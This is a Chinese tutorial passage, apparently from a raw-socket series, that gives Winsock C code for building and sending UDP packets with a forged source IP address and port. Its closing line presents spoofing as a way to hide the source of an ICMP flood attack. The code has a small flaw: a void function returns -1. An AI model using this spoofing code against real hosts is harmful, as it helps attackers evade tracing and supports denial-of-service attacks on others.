ip欺骗(原始套接字系列九)
由于使用Raw Socket的时候,IP报头可完全由程序员自定义,所以我们可以任意地修改本地发送包的IP地址,使得接收方错误的认为IP报文是由欺骗地址发出的。
下面的程序演示了向某目标发送IP地址伪装的UDP报文的过程:
void sendPesuoIpUDP(void) { WSADATA wsd; if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) { printf("WSAStartup() failed: %d ", GetLastError()); return; } SOCKET s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0,WSA_FLAG_OVERLAPPED); // Create a raw socket if (s == INVALID_SOCKET) { printf("WSASocket() failed: %d ", WSAGetLastError()); return - 1; } BOOL bOpt = TRUE; int ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char*) &bOpt, sizeof(bOpt)); // 使用IP_HDRINCL if (ret == SOCKET_ERROR) { printf("setsockopt(IP_HDRINCL) failed: %d ", WSAGetLastError()); return - 1; } const int BUFFER_SIZE = 80; char buffer[BUFFER_SIZE]; const char *strMessage = "treat demo"; // Message to send // Set IP header IP_HDR ipHdr; UDP_HDR udpHdr; const unsigned short iIPSize = sizeof(ipHdr) / sizeof(unsigned long); const unsigned short iIPVersion = 4; ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; // IP type of service const unsigned short iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + strlen(strMessage); ipHdr.ip_totallength = htons(iTotalSize); // Total packet len ipHdr.ip_id = 0; // Unique identifier: set to 0 ipHdr.ip_offset = 0; // Fragment offset field ipHdr.ip_ttl = 128; // Time to live ipHdr.ip_protocol = 0x11; // Protocol(UDP) ipHdr.ip_checksum = 0; // IP checksum const char *target_ip_address = "192.168.0.102"; const char *treat_ip_address = "1.0.5.7"; ipHdr.ip_destaddr = inet_addr(target_ip_address); // 接收方IP地址 ipHdr.ip_srcaddr = inet_addr(treat_ip_address); // 发送方伪造的IP地址 // Set UDP header const u_short uToPort = 8000; udpHdr.dst_portno = htons(uToPort); // 接收方端口 const u_short uFromPort = 1000; udpHdr.src_portno = htons(uFromPort); // 发送伪造的端口 const unsigned short iUdpSize = sizeof(udpHdr) + strlen(strMessage); udpHdr.udp_length = htons(iUdpSize); udpHdr.udp_checksum = 0; // 组建待发送的UDP报文 ZeroMemory(buffer, BUFFER_SIZE); char *ptr = buffer; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, strlen(strMessage)); // Apparently, this SOCKADDR_IN structure makes no difference. // Whatever we put as the destination IP addr in the IP header is what goes. // Specifying a different destination in remote will be ignored. sockaddr_in remote; remote.sin_family = AF_INET; remote.sin_port = htons(8000); remote.sin_addr.s_addr = inet_addr("192.168.0.102"); printf("TO %s:%d ", target_ip_address, uToPort); ret = sendto(s, buffer, iTotalSize, 0, (SOCKADDR*) &remote, sizeof(remote)); // 发送伪造的报文 if (ret == SOCKET_ERROR) { printf("sendto() failed: %d ", WSAGetLastError()); } else printf("sent %d bytes ", ret); closesocket(s); WSACleanup(); return; } |
如果我们在第4节描述的ICMP FLOOD攻击中伪造IP地址,则对方将无法检测出究竟是谁在对其进行攻击,实际上,这也是一种非常常用的黑客攻击中隐藏自身的途径。